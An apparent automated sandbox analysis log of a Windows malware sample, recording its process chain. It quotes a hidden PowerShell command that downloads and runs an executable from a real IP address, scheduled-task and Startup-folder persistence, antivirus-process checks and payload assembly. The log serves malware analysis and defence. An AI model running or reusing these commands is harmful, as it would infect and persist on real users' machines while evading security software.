Source: C:\Users\user\Desktop\random.exe | Code function: 0_2_00481201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock
Source: C:\Users\user\Desktop\random.exe | Code function: 0_2_0048E8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState
Source: C:\Windows\System32\svchost.exe | File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE | File created: C:\Windows\Tasks\rapes.job
Source: C:\Users\user\AppData\Local\Temp\10141760101\ReK7Ewx.exe | File created: C:\Windows\CombatTongue
Source: C:\Users\user\AppData\Local\Temp\10141760101\ReK7Ewx.exe | File created: C:\Windows\PracticeRoot
Source: C:\Users\user\AppData\Local\Temp\10141760101\ReK7Ewx.exe | File created: C:\Windows\PlatesRegister
Source: C:\Users\user\Desktop\random.exe | Code function: 0_2_00492046
Source: C:\Users\user\Desktop\random.exe | Code function: 0_2_00428060
Source: C:\Users\user\Desktop\random.exe | Code function: 0_2_00488298
Source: C:\Users\user\Desktop\random.exe | Code function: 0_2_0045E4FF
Source: C:\Users\user\Desktop\random.exe | Code function: 0_2_0045676B
Source: C:\Users\user\Desktop\random.exe | Code function: 0_2_004B4873
Source: C:\Users\user\Desktop\random.exe | Code function: 0_2_0042CAF0
Source: C:\Users\user\Desktop\random.exe | Code function: 0_2_0044CAA0
Source: C:\Users\user\Desktop\random.exe | Code function: 0_2_0043CC39
Source: C:\Users\user\Desktop\random.exe | Code function: 0_2_00456DD9
Source: C:\Users\user\Desktop\random.exe | Code function: 0_2_0043B119
Source: C:\Users\user\Desktop\random.exe | Code function: 0_2_004291C0
Source: C:\Users\user\Desktop\random.exe | Code function: 0_2_00441394
Source: C:\Users\user\Desktop\random.exe | Code function: 0_2_00441706
Source: C:\Users\user\Desktop\random.exe | Code function: 0_2_0044781B
Source: C:\Users\user\Desktop\random.exe | Code function: 0_2_0043997D
Source: C:\Users\user\Desktop\random.exe | Code function: 0_2_00427920
Source: C:\Users\user\Desktop\random.exe | Code function: 0_2_004419B0
Source: C:\Users\user\Desktop\random.exe | Code function: 0_2_00447A4A
Source: C:\Users\user\Desktop\random.exe | Code function: 0_2_00441C77
Source: C:\Users\user\Desktop\random.exe | Code function: 0_2_00447CA7
Source: C:\Users\user\Desktop\random.exe | Code function: 0_2_004ABE44
Source: C:\Users\user\Desktop\random.exe | Code function: 0_2_00459EEE
Source: C:\Users\user\Desktop\random.exe | Code function: 0_2_0042BF40
Source: C:\Users\user\Desktop\random.exe | Code function: 0_2_00441F32
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Code function: 13_1_0021CC24
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Code function: 13_1_0021B036
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Code function: 13_1_00219603
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Code function: 13_1_00120A40
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Code function: 13_1_000E3E86
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Code function: 13_1_000A20BF
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Code function: 13_1_002160E6
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Code function: 13_1_002236F3
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Code function: 13_1_002200C3
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Code function: 13_1_000E4B02
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Code function: 13_1_000A2D31
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Code function: 13_1_00217B7F
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Code function: 13_1_000A55AB
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Code function: 13_1_002145E9
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Code function: 13_1_000F99FB
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Code function: 14_2_000361F0
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Code function: 14_2_0003B700
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Code function: 14_2_00062C20
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Code function: 14_2_00074047
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Code function: 14_2_0005B4C0
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Code function: 14_2_000718D7
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Code function: 14_2_00075CD4
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Code function: 14_2_000351A0
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Code function: 14_2_00075DF4
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Code function: 14_2_0005F6DB
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Code function: 14_2_00034EF0
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Code function: 14_1_0021CC24
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Code function: 14_1_0021B036
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Code function: 14_1_00219603
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Code function: 14_1_00120A40
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Code function: 14_1_000E3E86
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Code function: 14_1_000A20BF
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Code function: 14_1_002160E6
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Code function: 14_1_002236F3
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Code function: 14_1_002200C3
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Code function: 14_1_000E4B02
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Code function: 14_1_000A2D31
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Code function: 14_1_00217B7F
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Code function: 14_1_000A55AB
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Code function: 14_1_002145E9
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Code function: 14_1_000F99FB
Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\EduGenius Studios Co\EduGeniusX.com 1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
Source: C:\Users\user\Desktop\random.exe | Code function: String function: 0043F9F2 appears 40 times
Source: C:\Users\user\Desktop\random.exe | Code function: String function: 00429CB3 appears 31 times
Source: C:\Users\user\Desktop\random.exe | Code function: String function: 00440A30 appears 46 times
Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7856 -s 764
Source: random.exe, 00000000.00000003.1165251199.0000000001772000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: FV_ORIGINALFILENAME vs random.exe
Source: random.exe, 00000000.00000003.1167102753.00000000018B5000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: FV_ORIGINALFILENAME vs random.exe
Source: random.exe, 00000000.00000003.1167102753.00000000018B5000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamefaS vs random.exe
Source: random.exe, 00000000.00000002.1171012712.0000000001779000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: FV_ORIGINALFILENAME vs random.exe
Source: random.exe, 00000000.00000003.1166073504.0000000001773000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: FV_ORIGINALFILENAME vs random.exe
Source: random.exe, 00000000.00000003.1164387282.0000000001765000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: FV_ORIGINALFILENAME vs random.exe
Source: random.exe, 00000000.00000003.1167668940.0000000001776000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: FV_ORIGINALFILENAME vs random.exe
Source: random.exe, 00000000.00000003.1161904428.00000000018AE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: FV_ORIGINALFILENAME vs random.exe
Source: random.exe, 00000000.00000003.1161904428.00000000018AE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamefaS vs random.exe
Source: C:\Windows\SysWOW64\mshta.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: C:\Windows\System32\mshta.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: random.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: V0Bt74c[1].exe.14.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: V0Bt74c.exe.14.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: PfOHmro[1].exe.14.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: PfOHmro.exe.14.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE.5.dr | Static PE information: Section: ZLIB complexity 0.9989508006198347
Source: TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE.5.dr | Static PE information: Section: zmpqmbag ZLIB complexity 0.9940843995347485
Source: rapes.exe.11.dr | Static PE information: Section: ZLIB complexity 0.9989508006198347
Source: rapes.exe.11.dr | Static PE information: Section: zmpqmbag ZLIB complexity 0.9940843995347485
Source: V0Bt74c[1].exe.14.dr | Static PE information: Section: .CSS ZLIB complexity 1.0003352171985815
Source: V0Bt74c.exe.14.dr | Static PE information: Section: .CSS ZLIB complexity 1.0003352171985815
Source: yUI6F6C[1].exe.14.dr | Static PE information: Section: mzhehwmc ZLIB complexity 0.9941881155740228
Source: yUI6F6C.exe.14.dr | Static PE information: Section: mzhehwmc ZLIB complexity 0.9941881155740228
Source: ADFoyxP[1].exe.14.dr | Static PE information: Section: .reloc ZLIB complexity 1.002197265625
Source: ADFoyxP.exe.14.dr | Static PE information: Section: .reloc ZLIB complexity 1.002197265625
Source: CgmaT61[1].exe.14.dr | Static PE information: Section: mzhehwmc ZLIB complexity 0.9941881155740228
Source: CgmaT61.exe.14.dr | Static PE information: Section: mzhehwmc ZLIB complexity 0.9941881155740228
Source: mAtJWNv[1].exe.14.dr | Static PE information: Section: .css ZLIB complexity 0.9975900423728814
Source: mAtJWNv.exe.14.dr | Static PE information: Section: .css ZLIB complexity 0.9975900423728814
Source: PfOHmro[1].exe.14.dr | Static PE information: Section: .CSS ZLIB complexity 1.0003681282722514
                                    Source: PfOHmro.exe.14.drStatic PE information: Section: .CSS ZLIB complexity 1.0003681282722514
                                    Source: rapes.exe.11.drStatic PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
                                    Source: yUI6F6C.exe.14.drStatic PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
                                    Source: CgmaT61.exe.14.drStatic PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
                                    Source: yUI6F6C[1].exe.14.drStatic PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
                                    Source: CgmaT61[1].exe.14.drStatic PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
                                    Source: TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE.5.drStatic PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
                                    Source: mAtJWNv[1].exe.14.dr, Ce716WgjPJi1to0DwO.csCryptographic APIs: 'CreateDecryptor'
                                    Source: mAtJWNv.exe.14.dr, Ce716WgjPJi1to0DwO.csCryptographic APIs: 'CreateDecryptor'
                                    Source: classification engineClassification label: mal100.phis.troj.spyw.expl.evad.winEXE@78/67@7/5
                                    Source: C:\Users\user\Desktop\random.exeCode function: 0_2_004937B5 GetLastError,FormatMessageW,0_2_004937B5
                                    Source: C:\Users\user\Desktop\random.exeCode function: 0_2_004810BF AdjustTokenPrivileges,CloseHandle,0_2_004810BF
                                    Source: C:\Users\user\Desktop\random.exeCode function: 0_2_004816C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_004816C3
                                    Source: C:\Users\user\Desktop\random.exeCode function: 0_2_004951CD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_004951CD
                                    Source: C:\Users\user\Desktop\random.exeCode function: 0_2_004AA67C CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_004AA67C
                                    Source: C:\Users\user\Desktop\random.exeCode function: 0_2_0049648E _wcslen,CoInitialize,CoCreateInstance,CoUninitialize,0_2_0049648E
                                    Source: C:\Users\user\Desktop\random.exeCode function: 0_2_004242A2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_004242A2
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\ReK7Ewx[1].exe
                                    Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exeMutant created: NULL
                                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1428:120:WilError_03
                                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:568:120:WilError_03
                                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7524:120:WilError_03
                                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6128:120:WilError_03
                                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2616:120:WilError_03
                                    Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeMutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
                                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5872:120:WilError_03
                                    Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7856
                                    Source: C:\Users\user\Desktop\random.exeFile created: C:\Users\user\AppData\Local\Temp\tmxzSk7p3.htaJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\10141760101\ReK7Ewx.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c expand Ae.msi Ae.msi.bat & Ae.msi.bat
                                    Source: random.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\SysWOW64\mshta.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\random.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: random.exe | Virustotal: Detection: 48%
Source: random.exe | ReversingLabs: Detection: 47%
Source: TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE | String found in binary or memory: " /add
Source: TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE | String found in binary or memory: " /add /y
Source: rapes.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: rapes.exe | String found in binary or memory: " /add /y
Source: rapes.exe | String found in binary or memory: " /add
Source: unknown | Process created: C:\Users\user\Desktop\random.exe "C:\Users\user\Desktop\random.exe"
Source: C:\Users\user\Desktop\random.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c schtasks /create /tn zhvFsmabDCl /tr "mshta C:\Users\user\AppData\Local\Temp\tmxzSk7p3.hta" /sc minute /mo 25 /ru "user" /f
Source: C:\Users\user\Desktop\random.exe | Process created: C:\Windows\SysWOW64\mshta.exe mshta C:\Users\user\AppData\Local\Temp\tmxzSk7p3.hta
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn zhvFsmabDCl /tr "mshta C:\Users\user\AppData\Local\Temp\tmxzSk7p3.hta" /sc minute /mo 25 /ru "user" /f
Source: C:\Windows\SysWOW64\mshta.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'WCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
Source: unknown | Process created: C:\Windows\System32\mshta.exe C:\Windows\system32\mshta.EXE C:\Users\user\AppData\Local\Temp\tmxzSk7p3.hta
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'WCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE "C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE "C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE"
Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe
Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE | Process created: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe "C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe"
Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe
Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe
Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Process created: C:\Users\user\AppData\Local\Temp\10141760101\ReK7Ewx.exe "C:\Users\user\AppData\Local\Temp\10141760101\ReK7Ewx.exe"
Source: C:\Users\user\AppData\Local\Temp\10141760101\ReK7Ewx.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c expand Ae.msi Ae.msi.bat & Ae.msi.bat
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\expand.exe expand Ae.msi Ae.msi.bat
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr "bdservicehost AvastUI AVGUI nsWscSvc ekrn SophosHealth"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 789919
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Deviation.msi
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "Brian" Challenges
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 789919\Occupation.com + Kate + Invisible + Tells + Gross + Amend + Foul + Snowboard + Digital + Fraud 789919\Occupation.com
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Drug.msi + ..\Contributors.msi + ..\Anthropology.msi + ..\Activities.msi + ..\Opens.msi + ..\Having.msi + ..\Dimension.msi + ..\Responding.msi + ..\Series.msi + ..\Salem.msi q
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\789919\Occupation.com Occupation.com q
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c schtasks.exe /create /tn "Consider" /tr "wscript //B 'C:\Users\user\AppData\Local\EduGenius Studios Co\EduGeniusX.js'" /sc minute /mo 5 /F
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Consider" /tr "wscript //B 'C:\Users\user\AppData\Local\EduGenius Studios Co\EduGeniusX.js'" /sc minute /mo 5 /F
Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\EduGenius Studios Co\EduGeniusX.js"
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com | Process created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EduGeniusX.url" & echo URL="C:\Users\user\AppData\Local\EduGenius Studios Co\EduGeniusX.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EduGeniusX.url" & exit
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Process created: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exe "C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exe"
Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exe | Process created: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exe "C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exe"
Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exe | Process created: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exe "C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exe"
Source: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7856 -s 764
Source: C:\Users\user\Desktop\random.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c schtasks /create /tn zhvFsmabDCl /tr "mshta C:\Users\user\AppData\Local\Temp\tmxzSk7p3.hta" /sc minute /mo 25 /ru "user" /f
Source: C:\Users\user\Desktop\random.exe | Process created: C:\Windows\SysWOW64\mshta.exe mshta C:\Users\user\AppData\Local\Temp\tmxzSk7p3.hta
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn zhvFsmabDCl /tr "mshta C:\Users\user\AppData\Local\Temp\tmxzSk7p3.hta" /sc minute /mo 25 /ru "user" /f
Source: C:\Windows\SysWOW64\mshta.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'WCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE "C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE"
Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'WCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE "C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE"
Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE | Process created: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe "C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe"
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Process created: C:\Users\user\AppData\Local\Temp\10141760101\ReK7Ewx.exe "C:\Users\user\AppData\Local\Temp\10141760101\ReK7Ewx.exe"
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Process created: C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exe "C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exe"
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\10141760101\ReK7Ewx.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c expand Ae.msi Ae.msi.bat & Ae.msi.bat
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\expand.exe expand Ae.msi Ae.msi.bat
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
